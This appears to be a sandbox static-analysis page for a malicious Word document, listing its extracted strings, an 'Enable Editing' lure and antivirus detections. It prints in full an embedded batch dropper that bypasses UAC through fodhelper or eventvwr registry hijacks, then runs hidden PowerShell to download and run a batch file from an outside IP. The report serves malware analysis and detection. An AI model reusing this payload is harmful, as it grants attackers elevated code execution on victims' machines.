popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

EMBED Package
Please first click on "Enable Editing" then double click on the PDF files to view the content.
Thanks.
hBJ( H
-S`U@b3
/kH!!~L!nZ
)-R91q.Lf
XIKh32
newbsplink.bat
C:\Users\Tester10\Documents\newbsplink.bat
C:\Users\Tester10\AppData\Local\Temp\newbsplink.bat
@echo Off
for /f "tokens=2 delims=," %%i in ('wmic os get caption^,version /format:csv') do set os=%%i
echo %os%|find " 10 ">nul && reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -WindowStyle Hidden -command \"IEX (New-Object Net.WebClient).DownloadFile('http://159.89.238.15/new.bat', 'C:\Users\Public\Libraries\new.bat');\" C:\Users\Public\Libraries\new.bat" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f||reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "cmd.exe /c powershell -WindowStyle Hidden -command \"IEX (New-Object Net.WebClient).DownloadFile('http://159.89.238.15/new.bat', 'C:\Users\Public\Libraries\new.bat');\" C:\Users\Public\Libraries\new.bat" /f && START /W eventvwr.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f3
Tester10
Normal
Tester10
Microsoft Office Word
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
~{s:FXI
k>\lc`
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Root Entry
WordDocument
ObjectPool
_1676031482
ObjInfo
Ole10Native
1Table
C:\Users\Tester10\AppData\Local\Temp\newbsplink.bat
newbsplink.bat*
C:\Users\Tester10\Documents\newbsplink.bat
SummaryInformation
DocumentSummaryInformation
CompObj
Normal
Default Paragraph Font
Table Normal
No List
Header
Header Char
Footer
Footer Char
Unknown
Times New Roman
Symbol
Calibri
Cambria Math
Tester10
Tester10
Antivirus Signature
Bkav Clean
DrWeb BAT.DownLoader.600
MicroWorld-eScan Heur.BZC.ONG.Pantera.14.534B1F13
FireEye Heur.BZC.ONG.Pantera.14.534B1F13
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
AegisLab Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 BAT/TrojanDownloader.Agent.OEV
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.ONG.Pantera.14.534B1F13
NANO-Antivirus Clean
ViRobot Clean
Ad-Aware Heur.BZC.ONG.Pantera.14.534B1F13
Emsisoft Heur.BZC.ONG.Pantera.14.534B1F13 (B)
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Artemis
CMC Clean
Sophos Clean
Ikarus Clean
GData Heur.BZC.ONG.Pantera.14.534B1F13
Jiangmin Clean
Avira Clean
MAX malware (ai score=80)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Heur.BZC.ONG.Pantera.14.534B1F13
SUPERAntiSpyware Clean
AhnLab-V3 Clean
ZoneAlarm Clean
Microsoft Clean
TotalDefense Clean
Acronis Clean
VBA32 Clean
ALYac Heur.BZC.ONG.Pantera.14.534B1F13
TACHYON Clean
Zoner Clean
Rising Exploit.BypassUAC/BAT!1.D324 (CLASSIC)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet BAT/Agent.00CD!tr
Panda Clean
Qihoo-360 Clean
No IRMA results available.